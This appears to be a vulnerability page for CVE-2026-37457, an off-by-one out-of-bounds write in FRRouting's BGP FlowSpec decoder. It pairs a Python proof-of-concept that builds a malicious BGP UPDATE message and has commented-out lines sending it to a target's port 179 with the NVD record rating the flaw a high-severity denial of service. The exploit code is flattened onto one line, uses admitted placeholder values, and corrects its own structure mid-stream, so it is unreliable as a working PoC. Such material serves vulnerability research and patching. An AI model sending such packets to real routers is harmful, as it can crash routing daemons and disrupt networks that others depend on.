CVE-2026-37457

import socket import struct # This is a generic PoC simulation for the Off-by-one write vulnerability in FRRouting. # It constructs a malicious BGP FlowSpec UPDATE message. # Note: Actual exploitation requires precise packet crafting based on the BGP spec and the vulnerable function. def create_malicious_bgp_update(): # BGP Marker (16 bytes) marker = b'\xFF' * 16 # BGP Message Length (2 bytes) - Placeholder, will update later length = 0 # BGP Message Type (1 byte) - 2 for UPDATE msg_type = 0x02 # Withdrawn Routes Length (2 bytes) withdrawn_len = struct.pack('!H', 0) # Total Path Attribute Length (2 bytes) # We will include a FlowSpec attribute here path_attr_len = struct.pack('!H', 20) # Example length # Path Attributes # Flags: Optional, Transitive (0xC0), Type Code: FlowSpec (usually specific codes) # This is a simplified representation to trigger the decode logic attr_flags = 0xC0 attr_type_code = 0x85 # Example FlowSpec type code attr_length = 16 # Crafted length to trigger off-by-one # Malicious component data designed to hit the off-by-one condition # The specific bytes depend on the check in bgp_flowspec_util.c mal_data = b'A' * 16 path_attributes = struct.pack('!BBH', attr_flags, attr_type_code, attr_length) + mal_data # Update the path attribute length field path_attr_len = struct.pack('!H', len(path_attributes)) # Construct the full message bgp_message = marker + withdrawn_len + path_attr_len + path_attributes # Calculate total length total_len = struct.pack('!H', len(bgp_message) + 2) # +2 for the length field itself? No, marker+length+type = 19 bytes header # Standard BGP message: Marker(16) + Length(2) + Type(1) + Body # Here we constructed body part incorrectly, let's fix structure body = withdrawn_len + path_attr_len + path_attributes total_len_val = len(body) + 19 # 16 marker + 2 len + 1 type + body header = marker + struct.pack('!H', total_len_val) + struct.pack('!B', msg_type) return header + body # Usage # target_ip = "192.168.1.1" # target_port = 179 # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # payload = create_malicious_bgp_update() # sock.send(payload) # sock.close()

{"cve": {"id": "CVE-2026-37457", "sourceIdentifier": "[email protected]", "published": "2026-05-01T18:16:14.770", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An off-by-one out-of-bounds write vulnerability in the bgp_flowspec_op_decode() function (bgpd/bgp_flowspec_util.c) of FRRouting (FRR) stable/10.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted FlowSpec component."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/FRRouting/frr/commit/0e6882bc72c0278988a47b2f0f73b7a91099a25c", "source": "[email protected]"}]}}